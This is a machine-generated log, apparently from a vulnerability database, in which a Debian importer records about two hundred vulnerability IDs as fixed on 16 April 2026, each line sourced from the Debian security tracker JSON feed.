2026-04-16T09:48:47.567321+00:00 Debian Importer Fixing VCID-n59p-w7sh-sbhb https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:48:43.697593+00:00 Debian Importer Fixing VCID-qkw5-9mqc-a7a3 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:48:33.006003+00:00 Debian Importer Fixing VCID-tm56-q7ka-ukft https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:48:31.531825+00:00 Debian Importer Fixing VCID-29r3-kvf4-n3hc https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:48:19.882156+00:00 Debian Importer Fixing VCID-1kxn-kce4-sufx https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:48:16.480206+00:00 Debian Importer Fixing VCID-1ftp-6fvm-rfez https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:47:46.644502+00:00 Debian Importer Fixing VCID-66d8-ts3a-ybev https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:47:32.753034+00:00 Debian Importer Fixing VCID-dvvt-ud6y-ffe8 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:47:27.540267+00:00 Debian Importer Fixing VCID-b32k-mwuv-hfeq https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:46:54.870656+00:00 Debian Importer Fixing VCID-u1fg-v9f6-z7ev https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:46:39.500019+00:00 Debian Importer Fixing VCID-b7u1-bftt-5kck https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:45:37.744623+00:00 Debian Importer Fixing VCID-wykb-4z7x-q7ga https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:45:31.821002+00:00 Debian Importer Fixing VCID-9z34-j85g-9kej https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:45:24.301276+00:00 Debian Importer Fixing VCID-y2pd-cxmz-6yfp https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:44:44.416805+00:00 Debian Importer Fixing VCID-jn3z-marg-3qgz https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:44:15.945762+00:00 Debian Importer Fixing VCID-3dsm-e7ye-wqe1 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:44:05.536665+00:00 Debian Importer Fixing VCID-zyg9-ad7g-ayex https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:43:18.664975+00:00 Debian Importer Fixing VCID-15mv-khzp-fqfk https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:42:28.682729+00:00 Debian Importer Fixing VCID-hrrw-ufje-akg5 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:42:14.158103+00:00 Debian Importer Fixing VCID-pyd8-6ykz-yka7 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:42:11.891683+00:00 Debian Importer Fixing VCID-qu7h-g9ku-pkct https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:41:57.785718+00:00 Debian Importer Fixing VCID-b3ps-gf9j-vubp https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:41:53.747959+00:00 Debian Importer Fixing VCID-bpqt-4zxx-fkd4 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:41:26.853906+00:00 Debian Importer Fixing VCID-n5r9-xgvu-skcg https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:41:18.227147+00:00 Debian Importer Fixing VCID-mt9h-kjh8-kbdu https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:41:16.684107+00:00 Debian Importer Fixing VCID-4633-67u6-akg8 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:41:09.819747+00:00 Debian Importer Fixing VCID-x8c1-btup-4ygu https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:41:07.603134+00:00 Debian Importer Fixing VCID-6wy3-xwez-vfej https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:40:50.332744+00:00 Debian Importer Fixing VCID-agz5-g8mr-e7hn https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:40:24.881017+00:00 Debian Importer Fixing VCID-chgt-azpf-auba https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:40:24.530642+00:00 Debian Importer Fixing VCID-2ea6-uaw4-wba9 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:40:15.593863+00:00 Debian Importer Fixing VCID-qye1-pv1p-8fbp https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:40:03.311494+00:00 Debian Importer Fixing VCID-rzs6-gp7c-vqhc https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:40:01.610724+00:00 Debian Importer Fixing VCID-4s25-p8ea-zkh7 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:39:52.059352+00:00 Debian Importer Fixing VCID-uatu-64df-b7b8 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:39:39.067863+00:00 Debian Importer Fixing VCID-5efq-7fxc-zyet https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:39:30.242150+00:00 Debian Importer Fixing VCID-b8hx-6u4j-b3dc https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:39:27.293437+00:00 Debian Importer Fixing VCID-rzzk-7g6m-3yfp https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:39:25.874782+00:00 Debian Importer Fixing VCID-c3ut-nv6u-efbj https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:39:20.002005+00:00 Debian Importer Fixing VCID-aars-axy1-4yd6 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:39:06.256461+00:00 Debian Importer Fixing VCID-spch-fffg-4yc5 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:39:01.684359+00:00 Debian Importer Fixing VCID-bf7n-dsx6-rqa2 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:38:53.815907+00:00 Debian Importer Fixing VCID-1a39-qxtg-fkhx https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:37:53.841193+00:00 Debian Importer Fixing VCID-9wbc-9sby-nfbq https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:37:44.575012+00:00 Debian Importer Fixing VCID-w8gb-1r6a-xud3 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:37:40.090301+00:00 Debian Importer Fixing VCID-2pwb-71f5-8ken https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:37:39.030061+00:00 Debian Importer Fixing VCID-zyh3-cmka-wqb8 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:37:05.011097+00:00 Debian Importer Fixing VCID-3fa4-xqhq-2fdq https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:36:34.905824+00:00 Debian Importer Fixing VCID-zz57-zmka-33ev https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:36:28.242802+00:00 Debian Importer Fixing VCID-rbgb-rbtn-eqff https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:35:36.469167+00:00 Debian Importer Fixing VCID-cz1h-x2a4-zkhj https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:35:23.514921+00:00 Debian Importer Fixing VCID-aycq-4vqg-ubgp https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:35:21.379747+00:00 Debian Importer Fixing VCID-6gh6-3g99-x7hz https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:35:19.422891+00:00 Debian Importer Fixing VCID-1abc-45xr-5bhb https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:35:15.003542+00:00 Debian Importer Fixing VCID-wwcs-2mw8-4bbr https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:34:52.984366+00:00 Debian Importer Fixing VCID-m31q-v2ue-zyh1 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:34:49.166749+00:00 Debian Importer Fixing VCID-6t7d-2hre-sqbw https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:34:45.887417+00:00 Debian Importer Fixing VCID-pydk-g827-guc5 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:34:03.824230+00:00 Debian Importer Fixing VCID-azvc-qdxb-7bbu https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:33:02.750715+00:00 Debian Importer Fixing VCID-fzct-psgq-8fcb https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:33:01.225078+00:00 Debian Importer Fixing VCID-j1jt-g5m8-ffbh https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:32:55.328241+00:00 Debian Importer Fixing VCID-74ak-g3rw-xygd https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:32:27.109707+00:00 Debian Importer Fixing VCID-sd54-b8z1-2fg7 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:32:03.516664+00:00 Debian Importer Fixing VCID-qrqm-h5se-1kep https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:31:44.213553+00:00 Debian Importer Fixing VCID-neaa-39c7-sfbc https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:31:34.732150+00:00 Debian Importer Fixing VCID-r5v1-hra4-c3ce https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:31:07.983573+00:00 Debian Importer Fixing VCID-1gh4-vs86-aufs https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:31:04.768806+00:00 Debian Importer Fixing VCID-bd1g-sfsp-37h7 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:30:50.195972+00:00 Debian Importer Fixing VCID-cwez-6cgj-17gz https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:30:42.757566+00:00 Debian Importer Fixing VCID-m9fk-3upg-33eu https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:30:25.756010+00:00 Debian Importer Fixing VCID-s4p8-s262-fqfx https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:30:22.669382+00:00 Debian Importer Fixing VCID-41xr-8ryd-z3ew https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:30:10.312172+00:00 Debian Importer Fixing VCID-mvga-q2ts-mqdh https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:30:05.238401+00:00 Debian Importer Fixing VCID-ccbh-689z-6kg2 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:29:46.014704+00:00 Debian Importer Fixing VCID-raec-f3zw-bfdn https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:29:38.554784+00:00 Debian Importer Fixing VCID-2fzg-6h13-s7bk https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:29:34.723375+00:00 Debian Importer Fixing VCID-rrvd-vd81-sfdm https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:29:34.635540+00:00 Debian Importer Fixing VCID-evu2-cxt1-4qhq https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:29:21.059374+00:00 Debian Importer Fixing VCID-cure-qgzj-8qfu https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:29:18.717307+00:00 Debian Importer Fixing VCID-gmm9-wk5j-gfh4 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:29:13.826124+00:00 Debian Importer Fixing VCID-g1e8-3nnr-gqff https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:29:07.999854+00:00 Debian Importer Fixing VCID-k1v6-jp8s-pye7 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:29:02.765343+00:00 Debian Importer Fixing VCID-3uv5-g9f4-kyg2 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:28:58.969962+00:00 Debian Importer Fixing VCID-mws6-wym5-d3f6 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:28:53.826316+00:00 Debian Importer Fixing VCID-vbqu-m52z-4qfg https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:28:17.679066+00:00 Debian Importer Fixing VCID-qc16-r3cs-cbdr https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:27:58.695967+00:00 Debian Importer Fixing VCID-p6m5-ntbm-auct https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:27:48.539708+00:00 Debian Importer Fixing VCID-u6vb-tewy-fkda https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:27:42.802758+00:00 Debian Importer Fixing VCID-s543-mazj-fqfd https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:26:55.975579+00:00 Debian Importer Fixing VCID-pwhs-ep5j-pqa7 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:26:42.975396+00:00 Debian Importer Fixing VCID-mn5y-2hmf-dkgy https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:26:25.532050+00:00 Debian Importer Fixing VCID-15ny-qqbj-qyfk https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:26:14.188104+00:00 Debian Importer Fixing VCID-8b34-juwg-pkcb https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:25:49.622960+00:00 Debian Importer Fixing VCID-gc9p-4vdm-rbah https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:25:27.725450+00:00 Debian Importer Fixing VCID-w289-j445-xka7 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:25:27.474256+00:00 Debian Importer Fixing VCID-75nc-a6rr-g3f6 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:25:17.578436+00:00 Debian Importer Fixing VCID-ray4-6nnk-93f7 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:25:16.347849+00:00 Debian Importer Fixing VCID-gdg8-aejn-83c4 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:25:10.918908+00:00 Debian Importer Fixing VCID-nzh5-tng5-8qdq https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:24:45.892074+00:00 Debian Importer Fixing VCID-fek5-ee6j-yqhv https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:24:31.176987+00:00 Debian Importer Fixing VCID-gs3p-hzxs-kfcq https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:24:23.858395+00:00 Debian Importer Fixing VCID-u7dc-kx3v-4ffz https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:24:08.090934+00:00 Debian Importer Fixing VCID-ksuz-r36k-wygy https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:23:35.481354+00:00 Debian Importer Fixing VCID-2wxd-hmac-4fcv https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:23:01.877831+00:00 Debian Importer Fixing VCID-gf8v-mmd7-hqag https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:22:50.617567+00:00 Debian Importer Fixing VCID-y3xr-bv9y-mqb5 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:22:46.465483+00:00 Debian Importer Fixing VCID-mrqv-9kq9-e3h5 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:22:34.275706+00:00 Debian Importer Fixing VCID-fzhr-jhhc-m3ej https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:22:19.941752+00:00 Debian Importer Fixing VCID-2a2h-yk41-qybt https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:22:10.158757+00:00 Debian Importer Fixing VCID-gq8m-6nq9-4bcq https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:22:08.856210+00:00 Debian Importer Fixing VCID-vp4y-qhc4-nuat https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:22:00.448321+00:00 Debian Importer Fixing VCID-vrqg-4fke-mfay https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:22:00.394006+00:00 Debian Importer Fixing VCID-y8aj-9qsj-7ucs https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:21:50.054085+00:00 Debian Importer Fixing VCID-4yhn-j5se-kfhv https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:21:49.669590+00:00 Debian Importer Fixing VCID-3g7r-1s51-akht https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:21:21.576447+00:00 Debian Importer Fixing VCID-p5aw-n691-nkff https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:21:19.077049+00:00 Debian Importer Fixing VCID-cqpp-1e1t-x7aa https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:21:16.552670+00:00 Debian Importer Fixing VCID-p3p3-suuz-dycr https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:21:04.380675+00:00 Debian Importer Fixing VCID-sr4g-yz6w-ebfk https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:20:42.677633+00:00 Debian Importer Fixing VCID-es5w-6nr6-73cn https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:20:31.619531+00:00 Debian Importer Fixing VCID-9cmk-p7za-wqds https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:20:30.627464+00:00 Debian Importer Fixing VCID-sat2-d6u2-f3c9 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:20:19.414948+00:00 Debian Importer Fixing VCID-kdw5-8y5z-zya5 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:20:04.053114+00:00 Debian Importer Fixing VCID-65cc-fm97-5uad https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:20:02.266118+00:00 Debian Importer Fixing VCID-2tv8-3fz3-3yfy https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:19:46.367651+00:00 Debian Importer Fixing VCID-cvqm-2557-e7ba https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:19:26.891181+00:00 Debian Importer Fixing VCID-ebyn-hv86-8kdz https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:19:17.314425+00:00 Debian Importer Fixing VCID-zrtt-8nnj-v3ch https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:18:31.707211+00:00 Debian Importer Fixing VCID-tc3z-912z-afc8 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:18:00.254012+00:00 Debian Importer Fixing VCID-x95w-ad3j-n7aj https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:17:39.687809+00:00 Debian Importer Fixing VCID-zrke-eysb-37e1 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:17:37.657165+00:00 Debian Importer Fixing VCID-v2r8-1wgn-1bgs https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:17:37.100061+00:00 Debian Importer Fixing VCID-pmpn-drv8-9ude https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:17:09.766930+00:00 Debian Importer Fixing VCID-7fw6-fzyj-7qf3 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:17:01.850216+00:00 Debian Importer Fixing VCID-p31j-f9s2-quh9 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:16:21.212650+00:00 Debian Importer Fixing VCID-hnhy-ksua-juam https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:16:09.523615+00:00 Debian Importer Fixing VCID-h78w-2n4r-8qfh https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:16:03.921830+00:00 Debian Importer Fixing VCID-wjeh-7bpm-zyga https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:15:53.841528+00:00 Debian Importer Fixing VCID-yah4-bf7d-w7f4 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:15:49.278672+00:00 Debian Importer Fixing VCID-46gw-xunr-jqbp https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:15:37.226381+00:00 Debian Importer Fixing VCID-vaks-d4k5-zue7 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:15:11.285261+00:00 Debian Importer Fixing VCID-tvzz-994x-xbcc https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:15:07.487400+00:00 Debian Importer Fixing VCID-w8d2-r2ct-m7gv https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:15:03.835353+00:00 Debian Importer Fixing VCID-utsb-dc1p-jkcq https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:14:56.947271+00:00 Debian Importer Fixing VCID-envn-rnvj-4yd2 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:14:56.650527+00:00 Debian Importer Fixing VCID-jhk3-xpvd-xbfj https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:14:41.988797+00:00 Debian Importer Fixing VCID-cznc-ubr4-zkcu https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:14:40.688859+00:00 Debian Importer Fixing VCID-ne72-mzag-2keg https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:14:33.908437+00:00 Debian Importer Fixing VCID-djqz-f6k5-fqfj https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:14:10.129392+00:00 Debian Importer Fixing VCID-c9cz-ebdv-t7eq https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:14:04.192808+00:00 Debian Importer Fixing VCID-kxus-63yw-sufe https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:13:52.881080+00:00 Debian Importer Fixing VCID-vdum-127b-qfbq https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:13:50.170858+00:00 Debian Importer Fixing VCID-u9gb-ppd4-3fd5 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:13:07.544577+00:00 Debian Importer Fixing VCID-85ny-1w5w-57aq https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:12:28.873754+00:00 Debian Importer Fixing VCID-tspc-ndj7-37h5 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:12:15.636580+00:00 Debian Importer Fixing VCID-4dpv-a4ns-hye2 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:12:14.209636+00:00 Debian Importer Fixing VCID-hwcd-dj3f-guay https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:11:52.873265+00:00 Debian Importer Fixing VCID-6kep-3ygd-hkbn https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:11:21.666575+00:00 Debian Importer Fixing VCID-4s1v-yhef-uqfx https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:11:12.330415+00:00 Debian Importer Fixing VCID-vbgc-23c4-77hu https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:10:57.872017+00:00 Debian Importer Fixing VCID-7pyx-kb1k-wufg https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:10:25.736443+00:00 Debian Importer Fixing VCID-uwj5-1fkf-7qg9 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:10:19.617672+00:00 Debian Importer Fixing VCID-h8cp-df76-c3dz https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:09:59.432723+00:00 Debian Importer Fixing VCID-t4gn-rwz1-ykcf https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:09:30.800423+00:00 Debian Importer Fixing VCID-1e38-tmxy-9kew https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:09:00.083261+00:00 Debian Importer Fixing VCID-g1ct-6d28-g3ab https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:08:51.503788+00:00 Debian Importer Fixing VCID-3ubj-wp5c-ruat https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:08:34.137273+00:00 Debian Importer Fixing VCID-ay8n-59tt-k7cp https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:08:15.260375+00:00 Debian Importer Fixing VCID-eeah-xwrp-f3b5 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:08:13.472372+00:00 Debian Importer Fixing VCID-g9xf-han8-6qgs https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:08:08.506664+00:00 Debian Importer Fixing VCID-sy2v-5ufy-sfc4 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:07:39.565806+00:00 Debian Importer Fixing VCID-trt9-1y65-53en https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:07:37.920352+00:00 Debian Importer Fixing VCID-bge6-p7sc-dqdu https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:07:37.492152+00:00 Debian Importer Fixing VCID-t2pe-etah-1bh3 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:07:21.657449+00:00 Debian Importer Fixing VCID-my2x-tnvf-wqbw https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:07:12.670487+00:00 Debian Importer Fixing VCID-zpcy-nms7-kuha https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:06:52.940425+00:00 Debian Importer Fixing VCID-xd3u-trsv-fbd3 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:06:23.028272+00:00 Debian Importer Fixing VCID-8v7y-kcz2-bbb9 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:06:09.545771+00:00 Debian Importer Fixing VCID-vyfj-c9vq-wkc9 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:06:04.771675+00:00 Debian Importer Fixing VCID-4p71-qkjb-97c6 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:06:02.770540+00:00 Debian Importer Fixing VCID-3136-6rpy-vbep https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:05:56.197999+00:00 Debian Importer Fixing VCID-fnck-7mvx-hqc9 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:05:52.526275+00:00 Debian Importer Fixing VCID-dabd-m3mf-3ker https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:05:49.009664+00:00 Debian Importer Fixing VCID-3vc6-9vhj-ckb2 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:05:40.986829+00:00 Debian Importer Fixing VCID-t9u8-a55c-xqhr https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:05:32.554184+00:00 Debian Importer Fixing VCID-3ju6-ah7s-suhh https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:05:19.670773+00:00 Debian Importer Fixing VCID-7ynu-qf57-ykba https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:05:19.308560+00:00 Debian Importer Fixing VCID-1v6v-gk53-8ye7 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:05:17.004900+00:00 Debian Importer Fixing VCID-ypyd-2tg4-xqb1 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:05:02.152520+00:00 Debian Importer Fixing VCID-xtfv-8vvu-qudb https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:05:01.426966+00:00 Debian Importer Fixing VCID-8gvq-1vk8-17bx https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:04:47.830038+00:00 Debian Importer Fixing VCID-cbqr-aybx-d3e6 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:04:10.518324+00:00 Debian Importer Fixing VCID-7yur-twpa-n3e1 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:04:09.461283+00:00 Debian Importer Fixing VCID-krca-sq7c-gfbg https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:04:06.719276+00:00 Debian Importer Fixing VCID-p2zf-ypkv-g7ay https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:03:33.625071+00:00 Debian Importer Fixing VCID-u9um-rar7-97e8 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:03:32.435110+00:00 Debian Importer Fixing VCID-b7dh-gjtk-qfhn https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:03:27.951716+00:00 Debian Importer Fixing VCID-kuyn-8jwc-qyb9 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:03:22.245265+00:00 Debian Importer Fixing VCID-68kj-s42g-effd https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:03:12.113098+00:00 Debian Importer Fixing VCID-r889-wzc7-1yem https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:03:06.576789+00:00 Debian Importer Fixing VCID-dzxx-5pbd-fqc4 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:03:03.936151+00:00 Debian Importer Fixing VCID-aqs4-r36j-ffe7 https://security-tracker.debian.org/tracker/data/json 38.4.0
